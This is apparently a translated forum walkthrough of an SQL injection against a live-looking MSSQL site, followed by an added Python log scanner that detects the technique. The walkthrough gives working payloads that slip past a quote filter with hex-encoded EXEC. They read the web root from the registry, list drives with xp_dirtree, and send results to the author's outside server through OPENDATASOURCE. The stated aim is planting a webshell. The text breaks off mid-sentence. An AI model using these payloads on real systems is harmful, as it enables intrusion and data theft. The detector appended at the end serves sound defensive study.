SQL Injection Advanced Skills nowthk

Source: Internet
Author: User

My goal is to find the website directory. The website and the MSSQL database are on the same server, and the injection runs with db_owner permission.

An injection point was found on a website; the error message returned was "xxxxxxxxxx0 error". Preliminary analysis showed that single quotes were being converted directly to 0, so injection tools could not be used: in practice the tool did not work, although it could still detect the permission as db_owner. The manual check was and 1 = (select is_srvrolemember('sysadmin')), a simple system-permission test. Fortunately, only single quotes were restricted; other symbols were not. Still, this is genuinely troublesome.
  
Our goal is to find where the website directory is located. Once it is found, back up the database directly into it and obtain a webshell.
  
First, read the location of the website directory from the IIS settings in the registry, then extract it.
Create a table xy: ; create table xy (xy1 nvarchar(256) null), and insert the value into the table. The statement is as follows:
; DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into xy (xy1) values (@result)
Because single quotes are converted, the command above certainly will not succeed. The idea now is to use DECLARE. My first approach was to put the three values HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots and / into three separate variables, so the statement reads:
; DECLARE @a varchar(255) select @a = 0x484b45595f4c4f43414c5f4d414348494e45 DECLARE @b varchar(255) select @b = 0x... /* hex of the registry path */ DECLARE @c varchar(255) select @c = 0x2f DECLARE @result varchar(255) exec master.dbo.xp_regread @a, @b, @c, @result output insert xy (xy1) values (@result)--

Unexpectedly, it did not succeed at all. I did not know why, so I searched Baidu and found the same problem discussed on the EvilOctal board, without any conclusion. So this method was shelved for the moment, and two days later a new approach came up: DECLARE can also assign a value to a variable, but instead of a single data item, a whole statement.

The method is as follows:
DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into xy (xy1) values (@result)
Convert the whole statement to a hexadecimal literal (0x...), then submit it as:
; DECLARE @s nvarchar(4000); SET @s = CAST(0x... AS nvarchar(4000)); EXEC(@s)
It executes successfully, and no single quotes are used anywhere. That settles the method; now we can make some progress.

Submit the statement above directly in the browser; the page returns normally. Then use and 1 = (select top 1 xy1 from xy) to force out the website directory: d:\wwwfuck. Haha, lucky. But backing up the database directly into that directory failed! Conclusion: 1. the statement is correct; 2. the directory is wrong.
So all we can guess now is that the website directory is somewhere on drive D. The only feasible method is to brute-force the directory names one by one. The depressing, troublesome part is coming again!
I was too lazy for that, so I thought of SQL's OPENDATASOURCE. I installed SQL Server on my own machine, IP address 211.11.11.11, so that results returned by the remote SQL execution could be inserted directly into a table on my own SQL Server; that makes it easy to see whether it worked. Create a table ku (id nvarchar(255)), then submit the following:
Insert into opendatasource('sqloledb', 'server=211.11.11.11;uid=sa;pwd=fuck!!;Database=test').test.dbo.ku select name from master.dbo.sysdatabases
test is my own database and ku is the table in it. If it works, opening the ku table locally shows the result; the statement above lists the names of all databases on the remote server.
The statement above contains single quotes, so convert it to hexadecimal and submit it as:
; DECLARE @s nvarchar(4000); SET @s = CAST(0x... AS nvarchar(4000)); EXEC(@s);
Open the ku table in the local test database: the names of all remote databases are listed successfully.
Next, return the directory listing of drive D on the server.

; create table temp (id nvarchar(255), num1 nvarchar(255))-- Succeeded
Insert the directory tree at every level into the table (level 1 is the root of drive D, level 2 the next layer, level 3 the one below that), with the statement: ; insert into temp (id, num1) exec master.dbo.xp_dirtree 'D:\'. It contains single quotes, so it certainly will not work as-is; it must be wrapped in a DECLARE variable. The statement:
; DECLARE @s nvarchar(4000); SET @s = CAST(0x... AS nvarchar(4000)); EXEC(@s);
Now the temp table holds every directory on drive D: num1 = 1 is a first-level directory, num1 = 2 a second-level directory, and so on.
OK, now return the first-level directories in the temp table to my local machine.
Create a local table mulu (name char(255)) and submit the following remotely:
Insert into opendatasource('sqloledb', 'server=211.11.11.11;uid=sa;pwd=fuck!!;Database=test').test.dbo.mulu select id from temp where num1 = 1
Converted to hexadecimal and submitted via DECLARE... after a long wait it died and failed. If you know the reason, please contact me.

Since the lazy method did not work, forget it; be diligent! Depressing!
The temp table on the remote server still holds directory names from every level, which is too messy, so create a new table remotely: ; create table temp1 (id nvarchar(4000))-- then insert the first-level directory names from temp into it: ; insert into temp1 (id) select id from temp where num1 = 1 --
Then run: and 1 = (select top 1 id from temp1 where id = 1). The error says roughly: xxxxxxxxxx MUbak cannot be converted to int... I am too lazy to copy the error message exactly; you get the idea.
The next directory cannot be read with and 1 = (select top 1 id from temp1 where id not in ('MUbak')) because of the single quotes. Can't DECLARE be used here? Wrong! That is not the error-based probe; don't confuse the two.

I smoked a cigarette and thought about it. There is another way: pull the directories out of temp1 layer by layer into a temp2 table: ; create table temp2 (id char(255))--.
First, understand the statement: copy all the names in temp1.id into temp2, excluding the MUbak directory. The statement should be:
Insert into temp2 (id) select id from temp1 where id not in ('MUbak')
Haha, single quotes again, so DECLARE! The statement above goes in as hexadecimal.
Statement:
; DECLARE @s nvarchar(4000); SET @s = CAST(0x... AS nvarchar(4000)); EXEC(@s);
Now probe the temp2 table: and 1 = (select top 1 id from temp2). The error reports that xxxxxxxxxx wwwbak cannot be converted to int... Another directory comes out.
However
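As an added defensive example (not code from the original post), the Python script below decodes the hexadecimal literals that the DECLARE / CAST(0x... AS nvarchar) / EXEC pattern used throughout this post hides from a quote filter, and flags the other indicators the post relies on: the and 1 = (select ...) probes, is_srvrolemember, the xp_regread and xp_dirtree extended procedures, OPENDATASOURCE, and the "conversion to int" errors used to read values back. The log lines, IP addresses, table names and the hidden statement are constructed for the example; the decoder is also checked against the page's own literal 0x484b45595f4c4f43414c5f4d414348494e45 (HKEY_LOCAL_MACHINE).

```python
import re
from urllib.parse import unquote_plus

# Constructed for this example: a statement of the kind the post wraps in
# CAST(0x... AS nvarchar(4000)). The literal is built from the clear text here
# so that the sample log line is exact; nothing is sent anywhere.
HIDDEN_STATEMENT = "insert into temp(id,num1) exec master.dbo.xp_dirtree 'D:\\'"
HIDDEN_HEX = "0x" + HIDDEN_STATEMENT.encode("utf-16-le").hex()

# Constructed access-log lines (request line plus any application error text).
SAMPLE_LOG = [
    "10.0.0.5 GET /news.asp?id=12 200",
    "10.0.0.9 GET /news.asp?id=12 and 1=(select is_srvrolemember('sysadmin')) 500",
    "10.0.0.9 GET /news.asp?id=12;DECLARE @s nvarchar(4000);SET @s=CAST("
    + HIDDEN_HEX + " AS nvarchar(4000));EXEC(@s);-- 200",
    "10.0.0.9 GET /news.asp?id=12 and 1=(select top 1 id from temp2) 500 "
    "Conversion failed when converting the nvarchar value 'wwwbak' to data type int",
]

# Indicators taken from the technique in the post; matched case-insensitively
# against both the raw request and every decoded hex literal.
INDICATORS = {
    "hex_cast_exec": re.compile(
        r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+n?varchar.*?exec\s*\(", re.I | re.S),
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*\(\s*select\b", re.I),
    "role_check": re.compile(r"\bis_srvrolemember\b", re.I),
    "extended_proc": re.compile(r"\bxp_(?:regread|dirtree)\b", re.I),
    "ad_hoc_remote": re.compile(r"\bopendatasource\s*\(", re.I),
    "type_conversion_error": re.compile(
        r"conversion failed when converting|"
        r"converting the \w+ value '.*?' to (?:a column of )?data type int", re.I),
}

# Any 0x literal of at least 4 bytes is worth decoding.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{8,})")


def decode_hex_literal(literal: str) -> str:
    """Recover the text behind a 0x literal.

    CAST(0x.. AS nvarchar) reads the bytes as UTF-16LE, CAST(0x.. AS varchar)
    as single-byte text. For ASCII payloads the UTF-16LE form has a zero in
    every odd byte, which is the heuristic used here (non-ASCII text in a
    UTF-16 literal would fall through to the single-byte branch).
    """
    body = literal[2:] if literal.lower().startswith("0x") else literal
    raw = bytes.fromhex(body)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def analyze_line(line: str) -> dict:
    """Return the indicators found in one log line plus any decoded literals."""
    text = unquote_plus(line)  # inspect the request as the server decoded it
    decoded = [decode_hex_literal(m.group(0)) for m in HEX_LITERAL.finditer(text)]
    haystack = text + "\n" + "\n".join(decoded)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"line": line, "indicators": hits, "decoded_literals": decoded}


def scan(lines) -> list:
    """Keep only the lines that triggered at least one indicator."""
    return [r for r in (analyze_line(l) for l in lines) if r["indicators"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["indicators"], finding["decoded_literals"])
```

Run this over raw request logs, before any application-side sanitizer: the filter described in this post only rewrites quotes to 0 and never sees the statement inside the hex literal, so the decoding step is what exposes xp_dirtree or OPENDATASOURCE in the third sample line. Matching the "converting the ... value" error text on responses catches the extraction phase even when the request itself looks like an ordinary numeric parameter. The fix on the application side is a parameterized query rather than character substitution; on the database side, an application login should not run as db_owner with access to xp_regread, xp_dirtree and ad hoc distributed queries.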
